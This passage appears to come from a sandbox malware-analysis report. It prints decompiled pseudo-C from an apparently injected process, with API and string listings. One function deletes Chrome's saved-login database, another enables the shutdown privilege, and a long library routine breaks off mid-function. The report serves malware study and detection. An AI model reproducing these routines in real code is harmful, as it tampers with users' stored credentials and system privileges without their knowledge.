                0x0040af8c
                0x0040af8c
                0x0040afac
                0x0040afb1
                0x0040afba
                0x0040afd0
                0x0040aff6
                0x0040aff8
                0x00000000
                0x0040afd2
                0x0040afd9
                0x0040afdc
                0x0040afea
                0x0040afec
                0x0040affd
                0x0040affd
                0x0040b002
                0x0040b007
                0x0040afe3
                0x0040afe3
                0x0040afe3
                0x0040afdc
                0x0040b00f
                0x0040b01a

                APIs
                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040AFC8
                • GetLastError.KERNEL32 ref: 0040AFD2
                Strings
                • [Chrome StoredLogins found, cleared!], xrefs: 0040AFF8
                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040AF93
                • [Chrome StoredLogins not found], xrefs: 0040AFEC
                • UserProfile, xrefs: 0040AF98
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DeleteErrorFileLast
                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                • API String ID: 2018770650-1062637481
                • Opcode ID: e41821ff3410b989b1a412a1a3b9a309f3df184b09367daac72509983c4f29aa
                • Instruction ID: a37d5e526ed20706eeea9cdf9ddb9e73f46e09c9fe60e21e4a2cfacd82ef4b6e
                • Opcode Fuzzy Hash: e41821ff3410b989b1a412a1a3b9a309f3df184b09367daac72509983c4f29aa
                • Instruction Fuzzy Hash: 8001F2B1A802065BCB04B775DC1B8BF7728AD61308B50027FF402B21E2FE39481986CF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00416840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00416840() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}






                0x00416854
                0x00416866
                0x00416872
                0x0041687e
                0x00416885
                0x0041689a

                APIs
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041684D
                • OpenProcessToken.ADVAPI32(00000000), ref: 00416854
                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416866
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416885
                • GetLastError.KERNEL32 ref: 0041688B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                • String ID: SeShutdownPrivilege
                • API String ID: 3534403312-3733053543
                • Opcode ID: b2a577c07cd5a6e11c0a1240a119a4fb26133fa7f03a6e195252090a31f2c8a0
                • Instruction ID: d2a690f146848b4c7648309cf1ebff16810b1493f15ef7d05bb093e1d547c9c1
                • Opcode Fuzzy Hash: b2a577c07cd5a6e11c0a1240a119a4fb26133fa7f03a6e195252090a31f2c8a0
                • Instruction Fuzzy Hash: A2F03A71905229ABDB10ABA0ED0DAEF7FBCEF05612F1000B0B805A1092D6388A04CAF6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004529D9 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 77%
                			E004529D9(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				char _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1128;
				void* _t1132;
				void* _t1133;
				unsigned int _t1134;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				intOrPtr* _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				void* _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int* _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				intOrPtr* _t1178;
				intOrPtr* _t1179;
				signed int _t1181;
				signed int _t1183;
				signed int _t1186;
				signed int _t1192;
				signed int _t1196;
				signed int _t1197;
				intOrPtr _t1199;
				intOrPtr _t1200;
				signed int _t1205;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1229;
				signed int _t1231;
				signed int _t1233;
				signed int _t1235;
				signed int* _t1237;
				signed int* _t1241;
				signed int _t1250;

				_t725 =  *0x46f00c; // 0xd60a1515
				_v8 = _t725 ^ _t1235;
				_t1016 = _a20;
				_t1145 = _a16;
				_v1924 = _t1145;
				_v1920 = _t1016;
				E004529AF( &_v1944, __eflags);
				_t1196 = _a8;
				_t730 = 0x2d;
				if((_t1196 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1145 = _t730;
				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
				_t1146 = _a4;
				if((_t1196 & 0x7ff00000) != 0) {
					L5:
					_t735 = E004487FA( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1146;
									_a8 = _t1196 & 0x7fffffff;
									_t1250 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1150 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1150 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1101 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1101 = 1;
									}
									_t1151 = _t1150 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1101;
									_t1037 = _t1036 & 0x000007ff;
									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
									_v1872 = _t1205;
									E004551F0(_t1037, _t1250);
									_push(_t1037);
									_push(_t1037);
									 *_t1237 = _t1250;
									_t764 = E00456080(E00455300(_t1151, _t1205), _t1250);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
									__eflags = _t1151;
									_v464 = _t1151;
									_t1022 = (0 | _t1151 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1205;
									if(_t1205 < 0) {
										__eflags = _t1205 - 0xfffffc02;
										if(_t1205 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1223 = _t1068;
														_t1178 =  &_v468 + _t1068 * 4;
														_v1880 = _t1178;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1178;
															}
															_t210 = _t1223 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1128 = 0;
																__eflags = 0;
															} else {
																_t1128 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t936 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1205 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1154 = 1 - _t1205;
											E00435760(_t1154,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1132 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
														goto L101;
													}
													_t1132 = _t1132 + 4;
													__eflags = _t1132 - 8;
													if(_t1132 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1133 = 0;
															__eflags = 0;
														} else {
															_t1133 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1224 = _t1069;
														__eflags = _t939 - _t1133 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1179 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1133 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1224 - _t1022;
															if(_t1224 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1179;
															}
															_t175 = _t1224 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1134 = 0;
																__eflags = 0;
															} else {
																_t1134 =  *(_t1179 - 4);
															}
															_t1179 = _t1179 - 4;
															_t945 = _v1880;
															_t1224 = _t1224 - 1;
															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1224 - 0xffffffff;
															if(_t1224 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1181 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1226 = _t1181 << 2;
														E00435760(_t1181,  &_v1396, 0, _t1226);
														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1181 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1227 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1227;
										__eflags = _t1022 - _t1227;
										if(_t1022 != _t1227) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1183 = _t956 >> 5;
											_v1872 = _t1183;
											_v1908 = _t1073 - _t957;
											_t960 = E00456040(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1139 = _t1022 + _t1183;
											__eflags = _v1876 - _t964;
											_v1892 = _t1139;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1139 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
											__eflags = _t1139 - 0x73;
											if(_t1139 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1139 - _t1078;
													if(_t1139 >= _t1078) {
														_t1139 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1139;
													_v1880 = _t974;
													__eflags = _t1139 - 0xffffffff;
													if(_t1139 != 0xffffffff) {
														_t1140 = _v1872;
														_t1229 = _t1139 - _t1140;
														__eflags = _t1229;
														_t1082 =  &_v468 + _t1229 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1140;
															if(_t974 < _t1140) {
																break;
															}
															__eflags = _t1229 - _t1022;
															if(_t1229 >= _t1022) {
																_t1186 = 0;
																__eflags = 0;
															} else {
																_t1186 =  *_t1082;
															}
															__eflags = _t1229 - 1 - _t1022;
															if(_t1229 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1229 = _t1229 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1139 = _v1892;
														_t1183 = _v1872;
														_t1227 = 2;
													}
													__eflags = _t1183;
													if(_t1183 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1183 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1139;
													} else {
														_v472 = _t1139 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1227;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
													goto L53;
												}
												_t1086 = _t1086 + 4;
												__eflags = _t1086 - 8;
												if(_t1086 != 8) {
													continue;
												} else {
													_t985 = _v1872 + 2;
													_t986 = _t985 & 0x0000001f;
													_t1087 = 0x20;
													_t1088 = _t1087 - _t986;
													_v1888 = _t986;
													_t1231 = _t985 >> 5;
													_v1876 = _t1231;
													_v1908 = _t1088;
													_t989 = E00456040(1, _t1088, 0);
													_v1896 = _v1896 & 0x00000000;
													_t990 = _t989 - 1;
													__eflags = _t990;
													asm("bsr ecx, edi");
													_v1884 = _t990;
													_v1912 =  !_t990;
													if(_t990 == 0) {
														_t1089 = 0;
														__eflags = 0;
													} else {
														_t1089 = _t1088 + 1;
													}
													_t992 = 0x20;
													_t993 = _t992 - _t1089;
													_t1142 = _t1231 + 2;
													__eflags = _v1888 - _t993;
													_v1880 = _t1142;
													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
													__eflags = _t1142 - 0x73;
													_v1865 = _t994;
													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
													__eflags = _t1142 - 0x73;
													if(_t1142 != 0x73) {
														L28:
														_t995 = 0;
														__eflags = 0;
													} else {
														__eflags = _t994;
														if(_t994 == 0) {
															goto L28;
														} else {
															_t995 = 1;
														}
													}
													__eflags = _t1090;
													if(_t1090 != 0) {
														L50:
														__eflags = 0;
														_t1025 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1237 =  &(_t1237[4]);
													} else {
														__eflags = _t995;
														if(_t995 != 0) {
															goto L50;
														} else {
															_t1093 = 0x72;
															__eflags = _t1142 - _t1093;
															if(_t1142 >= _t1093) {
																_t1142 = _t1093;
																_v1880 = _t1093;
															}
															_t1094 = _t1142;
															_v1892 = _t1094;
															__eflags = _t1142 - 0xffffffff;
															if(_t1142 != 0xffffffff) {
																_t1143 = _v1876;
																_t1233 = _t1142 - _t1143;
																__eflags = _t1233;
																_t1004 =  &_v468 + _t1233 * 4;
																_v1872 = _t1004;
																while(1) {
																	__eflags = _t1094 - _t1143;
																	if(_t1094 < _t1143) {
																		break;
																	}
																	__eflags = _t1233 - _t1022;
																	if(_t1233 >= _t1022) {
																		_t1192 = 0;
																		__eflags = 0;
																	} else {
																		_t1192 =  *_t1004;
																	}
																	__eflags = _t1233 - 1 - _t1022;
																	if(_t1233 - 1 >= _t1022) {
																		_t1006 = 0;
																		__eflags = 0;
																	} else {
																		_t1006 =  *(_v1872 - 4);
																	}
																	_t1099 = _v1892;
																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
																	_t1094 = _t1099 - 1;
																	_t1233 = _t1233 - 1;
																	_t1004 = _v1872 - 4;
																	_v1892 = _t1094;
																	_v1872 = _t1004;
																	__eflags = _t1094 - 0xffffffff;
																	if(_t1094 != 0xffffffff) {
																		_t1022 = _v472;
																		continue;
																	}
																	break;
																}
																_t1142 = _v1880;
																_t1231 = _v1876;
															}
															__eflags = _t1231;
															if(_t1231 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1231 << 2);
																_t1237 =  &(_t1237[3]);
															}
															__eflags = _v1865;
															_t1025 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1142;
															} else {
																_v472 = _t1142 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t999 = 4;
													__eflags = 1;
													_v1396 = _t999;
													_v1400 = 1;
													_v936 = 1;
													_push(_t999);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1025);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[4]);
									}
									_t782 = _v1904;
									_t1043 = 0xa;
									_v1912 = _t1043;
									__eflags = _t782;
									if(_t782 < 0) {
										_t783 =  ~_t782;
										_t784 = _t783 / _t1043;
										_v1880 = _t784;
										_t1044 = _t783 % _t1043;
										_v1884 = _t1044;
										__eflags = _t784;
										if(_t784 == 0) {
											L249:
											__eflags = _t1044;
											if(_t1044 != 0) {
												_t820 =  *(0x45c72c + _t1044 * 4);
												_v1896 = _t820;
												__eflags = _t820;
												if(_t820 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t820 - 1;
													if(_t820 != 1) {
														_t1055 = _v472;
														__eflags = _t1055;
														if(_t1055 != 0) {
															_t1161 = 0;
															_t1213 = 0;
															__eflags = 0;
															do {
																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
																_t820 = _v1896;
																asm("adc edx, 0x0");
																_t1213 = _t1213 + 1;
																_t1161 = _t1113;
																__eflags = _t1213 - _t1055;
															} while (_t1213 != _t1055);
															__eflags = _t1161;
															if(_t1161 != 0) {
																_t826 = _v472;
																__eflags = _t826 - 0x73;
																if(_t826 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t784 - 0x26;
												if(_t784 > 0x26) {
													_t784 = 0x26;
												}
												_t1056 =  *(0x45c696 + _t784 * 4) & 0x000000ff;
												_v1872 = _t784;
												_v1400 = ( *(0x45c696 + _t784 * 4) & 0x000000ff) + ( *(0x45c697 + _t784 * 4) & 0x000000ff);
												E00435760(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
												_t837 = E004351E0( &(( &_v1396)[_t1056]), 0x45bd90 + ( *(0x45c694 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x45c697 + _t784 * 4) & 0x000000ff) << 2);
												_t1057 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1057;
												__eflags = _t1057 - 1;
												if(_t1057 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1057 - _v472;
														_t1164 =  &_v1396;
														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
														__eflags = _t838;
														if(_t838 != 0) {
															_t1114 =  &_v468;
														} else {
															_t1164 =  &_v468;
															_t1114 =  &_v1396;
														}
														_v1908 = _t1114;
														__eflags = _t838;
														if(_t838 == 0) {
															_t1057 = _v472;
														}
														_v1876 = _t1057;
														__eflags = _t838;
														if(_t838 != 0) {
															_v1892 = _v472;
														}
														_t1115 = 0;
														_t1215 = 0;
														_v1864 = 0;
														__eflags = _t1057;
														if(_t1057 == 0) {
															L243:
															_v472 = _t1115;
															_t840 = _t1115 << 2;
															__eflags = _t840;
															_push(_t840);
															_t841 =  &_v1860;
															goto L244;
														} else {
															_t1165 = _t1164 -  &_v1860;
															__eflags = _t1165;
															_v1928 = _t1165;
															do {
																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
																_v1896 = _t847;
																__eflags = _t847;
																if(_t847 != 0) {
																	_t848 = 0;
																	_t1166 = 0;
																	_t1058 = _t1215;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1058 - 0x73;
																		if(_t1058 == 0x73) {
																			goto L258;
																		} else {
																			_t1165 = _v1928;
																			_t1057 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1058 - 0x73;
																			if(_t1058 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1058 - _t1115;
																			if(_t1058 == _t1115) {
																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																				_t859 = _t848 + 1 + _t1215;
																				__eflags = _t859;
																				_v1864 = _t859;
																				_t848 = _v1888;
																			}
																			_t854 =  *(_v1908 + _t848 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
																			asm("adc edx, 0x0");
																			_t848 = _v1888 + 1;
																			_t1058 = _t1058 + 1;
																			_v1888 = _t848;
																			_t1166 = _t854 * _v1896 >> 0x20;
																			_t1115 = _v1864;
																			__eflags = _t848 - _v1892;
																			if(_t848 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1166;
																				if(_t1166 == 0) {
																					goto L240;
																				}
																				__eflags = _t1058 - 0x73;
																				if(_t1058 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1058 - _t1115;
